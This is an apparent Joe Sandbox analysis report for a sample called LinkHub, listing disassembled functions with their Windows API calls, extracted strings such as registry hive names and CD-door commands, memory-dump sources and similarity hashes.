Part of subcall function 00C13535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C13547

Strings

CHECK, xrefs: 00C41521, 00C4153C
GETTEXT, xrefs: 00C41733
GETTOTALCOUNT, xrefs: 00C4148E, 00C414B3
EXISTS, xrefs: 00C41618, 00C41633
GETSELECTED, xrefs: 00C416EA
ISCHECKED, xrefs: 00C4177D
EXPAND, xrefs: 00C41694
GETITEMCOUNT, xrefs: 00C416BA
UNCHECK, xrefs: 00C417DA
COLLAPSE, xrefs: 00C4159D, 00C415B8
SELECT, xrefs: 00C417AD

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 9c25d674d9338a3bdef11ca59aa97548a38e3ad259c93f703d23442a5f7bc9a3
Instruction ID: fe1709828d7f6728bff78a0ecaeee307985143d955691f55e758abde00641f0a
Opcode Fuzzy Hash: 9c25d674d9338a3bdef11ca59aa97548a38e3ad259c93f703d23442a5f7bc9a3
Instruction Fuzzy Hash: 7FE180756043418FCB14DF25C4509AAB7E2FF94314B19899DF8E69B3A2DB30EE85CB81

Function 00C3D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3C10E,?,?), ref: 00C3D415
_wcslen.LIBCMT ref: 00C3D451
_wcslen.LIBCMT ref: 00C3D4C8
_wcslen.LIBCMT ref: 00C3D4FE
_wcslen.LIBCMT ref: 00C3D559
_wcslen.LIBCMT ref: 00C3D58F
_wcslen.LIBCMT ref: 00C3D5DF

Strings

HKCR, xrefs: 00C3D589, 00C3D58E
HKEY_CLASSES_ROOT, xrefs: 00C3D553, 00C3D558
HKEY_LOCAL_MACHINE, xrefs: 00C3D4C2, 00C3D4C7
HKCU, xrefs: 00C3D62E
HKEY_USERS, xrefs: 00C3D63F
HKU, xrefs: 00C3D650
HKLM, xrefs: 00C3D4F8, 00C3D4FD
HKEY_CURRENT_USER, xrefs: 00C3D61D
HKEY_CURRENT_CONFIG, xrefs: 00C3D5D9, 00C3D5DE
HKCC, xrefs: 00C3D60C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 72cac7175fc8304e0c65e9895b682659f0698b5ed0412786b3dd57b0f1588ea6
Instruction ID: 15339ed9e215a4be27992e2869c4f8f6049d9cb5f49ca54f86e6a116e36c8e16
Opcode Fuzzy Hash: 72cac7175fc8304e0c65e9895b682659f0698b5ed0412786b3dd57b0f1588ea6
Instruction Fuzzy Hash: B871F8B262011A8BCF109E7CE9416FF33A5AF60754F250569F87B97294EB35DE44C3A0

Function 00C48D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C48DB5
_wcslen.LIBCMT ref: 00C48DC9
_wcslen.LIBCMT ref: 00C48DEC
_wcslen.LIBCMT ref: 00C48E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C48E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C46691), ref: 00C48EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C48EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C48F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C48F5C
FreeLibrary.KERNEL32(?), ref: 00C48F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C48F78
DestroyIcon.USER32(?,?,?,?,?,00C46691), ref: 00C48F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C48FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C48FB0

Strings

.dll, xrefs: 00C48E06
.exe, xrefs: 00C48DE3
.icl, xrefs: 00C48DC3

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 7471f6404e6aa39acc6a667332b25dad6ecb63afaedc6f0edaf37ff89a91e8e2
Instruction ID: 2489c4191eebc7326f049da49aaf09a49284c58c927862efd63730c5df4d64ac
Opcode Fuzzy Hash: 7471f6404e6aa39acc6a667332b25dad6ecb63afaedc6f0edaf37ff89a91e8e2
Instruction Fuzzy Hash: 7661D371900215BFEB14DFA4CC45BBEB7A8BF09B10F104156F925D61D1DFB4AA58CBA0

Function 00C248BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C2493D
_wcslen.LIBCMT ref: 00C24948
_wcslen.LIBCMT ref: 00C2499F
_wcslen.LIBCMT ref: 00C249DD
GetDriveTypeW.KERNEL32(?), ref: 00C24A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C24A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C24A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C24ACC

Strings

wait, xrefs: 00C24A89
close, xrefs: 00C24943, 00C2495D
open, xrefs: 00C24999, 00C2499E
set cd door , xrefs: 00C24A6D
open , xrefs: 00C24A2A
closed, xrefs: 00C2494D, 00C24972, 00C2498B, 00C249C3, 00C249DC
close cd wait, xrefs: 00C24AB7
type cdaudio alias cd wait, xrefs: 00C24A46

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: bdcf93d7af7fe8ba7043ceb4646ec22d5e4fec338be8055e33748ddb71c60e76
Instruction ID: a6f9b3d7644adb29ee219aa4ee7b38cd79af434ef87e498c3fb8c4fe44e9c16d
Opcode Fuzzy Hash: bdcf93d7af7fe8ba7043ceb4646ec22d5e4fec338be8055e33748ddb71c60e76
Instruction Fuzzy Hash: C97111726082118FC714EF34D8409BBB7E8EF98758F00896DF8A687261EB71DE45CB81

Function 00C16382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C16395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C163A7
SetWindowTextW.USER32(?,?), ref: 00C163BE
GetDlgItem.USER32(?,000003EA), ref: 00C163D3
SetWindowTextW.USER32(00000000,?), ref: 00C163D9
GetDlgItem.USER32(?,000003E9), ref: 00C163E9
SetWindowTextW.USER32(00000000,?), ref: 00C163EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C16410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C1642A
GetWindowRect.USER32(?,?), ref: 00C16433
_wcslen.LIBCMT ref: 00C1649A
SetWindowTextW.USER32(?,?), ref: 00C164D6
GetDesktopWindow.USER32 ref: 00C164DC
GetWindowRect.USER32(00000000), ref: 00C164E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C1653A
GetClientRect.USER32(?,?), ref: 00C16547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00C1656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C16596

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 99184e9fa62d1406accb33d1442ed9ef04123203d7c33632d96605176a3d62be
Instruction ID: 395afd076c8cdcb0495421806a135eebf415a4dbc8e7e15ade8014da5f881544
Opcode Fuzzy Hash: 99184e9fa62d1406accb33d1442ed9ef04123203d7c33632d96605176a3d62be
Instruction Fuzzy Hash: 1871BE31900705AFDB20DFA8CE85BAEBBF5FF09704F100918E596A26A0D775EA80DB10

Function 00C3086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00C30884
LoadCursorW.USER32(00000000,00007F8A), ref: 00C3088F
LoadCursorW.USER32(00000000,00007F00), ref: 00C3089A
LoadCursorW.USER32(00000000,00007F03), ref: 00C308A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00C308B0
LoadCursorW.USER32(00000000,00007F01), ref: 00C308BB
LoadCursorW.USER32(00000000,00007F81), ref: 00C308C6
LoadCursorW.USER32(00000000,00007F88), ref: 00C308D1
LoadCursorW.USER32(00000000,00007F80), ref: 00C308DC
LoadCursorW.USER32(00000000,00007F86), ref: 00C308E7
LoadCursorW.USER32(00000000,00007F83), ref: 00C308F2
LoadCursorW.USER32(00000000,00007F85), ref: 00C308FD
LoadCursorW.USER32(00000000,00007F82), ref: 00C30908
LoadCursorW.USER32(00000000,00007F84), ref: 00C30913
LoadCursorW.USER32(00000000,00007F04), ref: 00C3091E
LoadCursorW.USER32(00000000,00007F02), ref: 00C30929
GetCursorInfo.USER32(?), ref: 00C30939
GetLastError.KERNEL32 ref: 00C3097B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: c41682b09d2a84bbbf09bbc07e0f623332050955b194bb3096ea90f86f548cd7
Instruction ID: 77936d0aaa4eb7806850adf8e9a36c8b7103d506ee68da692f1c4e61d1f03821
Opcode Fuzzy Hash: c41682b09d2a84bbbf09bbc07e0f623332050955b194bb3096ea90f86f548cd7
Instruction Fuzzy Hash: 334152B0D083196BDB109FBA8C8996EBFE8FF04754B50452AE11DE7291DA78D901CF91

Function 00BD0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BD0436

Part of subcall function 00BD045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C8170C,00000FA0,D3C6D664,?,?,?,?,00BF2733,000000FF), ref: 00BD048C
Part of subcall function 00BD045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BF2733,000000FF), ref: 00BD0497
Part of subcall function 00BD045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BF2733,000000FF), ref: 00BD04A8
Part of subcall function 00BD045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BD04BE
Part of subcall function 00BD045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BD04CC
Part of subcall function 00BD045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BD04DA
Part of subcall function 00BD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD0505
Part of subcall function 00BD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD0510

___scrt_fastfail.LIBCMT ref: 00BD0457

Part of subcall function 00BD0413: __onexit.LIBCMT ref: 00BD0419

Strings

kernel32.dll, xrefs: 00BD04A3
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BD0492
WakeAllConditionVariable, xrefs: 00BD04D2
SleepConditionVariableCS, xrefs: 00BD04C4
InitializeConditionVariable, xrefs: 00BD04B8

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 65f1c29da86b5a51f3bc85e14ceff4ad2f22eb0073da934c637acebe5a4c4aff
Instruction ID: 0c20a142c6d84b47d871b71de66ce30fe7a3987da69c28dff2552f0983a8beac
Opcode Fuzzy Hash: 65f1c29da86b5a51f3bc85e14ceff4ad2f22eb0073da934c637acebe5a4c4aff
Instruction Fuzzy Hash: 58214636A547056BD3103BA4AC4AB6DB7E8FB05B66F1001ABFD02D3390EF708C408B59

Function 00C13A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C13AD9
_wcslen.LIBCMT ref: 00C13B44

Strings

INSTANCE, xrefs: 00C13D9F
REGEXPCLASS, xrefs: 00C13BA1, 00C13BB2
CLASSNN, xrefs: 00C13B3F, 00C13B50
NAME, xrefs: 00C13C81, 00C13C92
TEXT, xrefs: 00C13DC8
CLASS, xrefs: 00C13AD4, 00C13AF1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: e0dd23c2d050039e9c2721f0341d5bd986e0b39f24ea0b149eb9762e29f997ed
Instruction ID: f27ac6df4f0adface9d61db64e20cf8277ecf9056872e866b0839a3c75f111d8
Opcode Fuzzy Hash: e0dd23c2d050039e9c2721f0341d5bd986e0b39f24ea0b149eb9762e29f997ed
Instruction Fuzzy Hash: 74E1F331A046569BCB149FB4C851AEDFBB4BF06718F108169E46AE7250EB30AFC5A790

Function 00C24F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00C4DCD0), ref: 00C24F6C
_wcslen.LIBCMT ref: 00C24F80
_wcslen.LIBCMT ref: 00C24FDE
_wcslen.LIBCMT ref: 00C25039
_wcslen.LIBCMT ref: 00C25084
_wcslen.LIBCMT ref: 00C250EC

Part of subcall function 00BCFD52: _wcslen.LIBCMT ref: 00BCFD5D

GetDriveTypeW.KERNEL32(?,00C77C10,00000061), ref: 00C25188

Strings

network, xrefs: 00C250E2, 00C250E7
removable, xrefs: 00C2502F, 00C25034
unknown, xrefs: 00C2514D
cdrom, xrefs: 00C24FD4, 00C24FD9
fixed, xrefs: 00C2507A, 00C2507F
ramdisk, xrefs: 00C25136
all, xrefs: 00C24F76, 00C24F7B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 948f9a1d4db489d6c3181e3b1ed105c4f7f9941883c82304aed11a833a4a122d
Instruction ID: 7f883cc344e03e64927c36de9e6485a5e22a0442b87b0e8d414c886dddee9263
Opcode Fuzzy Hash: 948f9a1d4db489d6c3181e3b1ed105c4f7f9941883c82304aed11a833a4a122d
Instruction Fuzzy Hash: 10B1E1316087229FC714DF28E890ABFB7E5BFA4720F50491DF4A687691EB70DD44CA92

Function 00C3BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C3BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3BC34
_wcslen.LIBCMT ref: 00C3BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3BC96
_wcslen.LIBCMT ref: 00C3BD92

Part of subcall function 00C20F4E: GetStdHandle.KERNEL32(000000F6), ref: 00C20F6D

_wcslen.LIBCMT ref: 00C3BDAB
_wcslen.LIBCMT ref: 00C3BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C3BE16
GetLastError.KERNEL32(00000000), ref: 00C3BE67
CloseHandle.KERNEL32(?), ref: 00C3BE99
CloseHandle.KERNEL32(00000000), ref: 00C3BEAA
CloseHandle.KERNEL32(00000000), ref: 00C3BEBC
CloseHandle.KERNEL32(00000000), ref: 00C3BECE
CloseHandle.KERNEL32(?), ref: 00C3BF43

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 8c99514c7f00ed6ba72979081eb05cfed590ee1076e9ff25adda8b42d2a5368c
Instruction ID: 7d488c195e8439fb5f81ba3641e7588af086a37c16f913870d60333bc5af199c
Opcode Fuzzy Hash: 8c99514c7f00ed6ba72979081eb05cfed590ee1076e9ff25adda8b42d2a5368c
Instruction Fuzzy Hash: 08F1BF316143009FC714EF24C891BAABBE5FF85314F18859DF99A8B2A2DB70ED41CB52

Function 00C34A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C4DCD0), ref: 00C34B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C34B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00C4DCD0), ref: 00C34B4F
FreeLibrary.KERNEL32(00000000,?,00C4DCD0), ref: 00C34B9B
StringFromGUID2.OLE32(?,?,00000028,?,00C4DCD0), ref: 00C34C05
SysFreeString.OLEAUT32(00000009), ref: 00C34CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C34D25
SysFreeString.OLEAUT32(?), ref: 00C34D4F

Strings

kernel32.dll, xrefs: 00C34B13
GetModuleHandleExW, xrefs: 00C34B24

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: e73f588fe586bffe2f137f1ba34eaec15e074ee6dda3d7950eb06789ddf28eb4
Instruction ID: ed64d341a326548526e6be3aadc14d98d8cc4f71964cec8e48be0db4dfba6acf
Opcode Fuzzy Hash: e73f588fe586bffe2f137f1ba34eaec15e074ee6dda3d7950eb06789ddf28eb4
Instruction Fuzzy Hash: E9122A75A10105EFDB18DF94C884EAEBBB5FF49318F148098E9169B251D731FE46CBA0

Function 00BB381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00C829C0), ref: 00BF3F72
GetMenuItemCount.USER32(00C829C0), ref: 00BF4022
GetCursorPos.USER32(?), ref: 00BF4066
SetForegroundWindow.USER32(00000000), ref: 00BF406F
TrackPopupMenuEx.USER32(00C829C0,00000000,?,00000000,00000000,00000000), ref: 00BF4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BF408E

Strings

0, xrefs: 00BB382D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 88e90fb37ec1cc08745b5ef7e1a4f972fa3d23a6cf7cc6714bc532492f893513
Instruction ID: f46d4fc1ff404dfff194a1313629367a6b091b3271f142f5b09da235099ef4b6
Opcode Fuzzy Hash: 88e90fb37ec1cc08745b5ef7e1a4f972fa3d23a6cf7cc6714bc532492f893513
Instruction Fuzzy Hash: 10712570644209BBEB219F28DC89FFABFE4FF05B64F100246F625661E0C7B19954D751

Function 00C47711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00C47823

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C47897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C478B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C478CC
DestroyWindow.USER32(?), ref: 00C478ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BB0000,00000000), ref: 00C4791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C47935
GetDesktopWindow.USER32 ref: 00C4794E
GetWindowRect.USER32(00000000), ref: 00C47955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C47985

Part of subcall function 00BB2234: GetWindowLongW.USER32(?,000000EB), ref: 00BB2242

Strings

0, xrefs: 00C477D0
tooltips_class32, xrefs: 00C47890, 00C47915

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
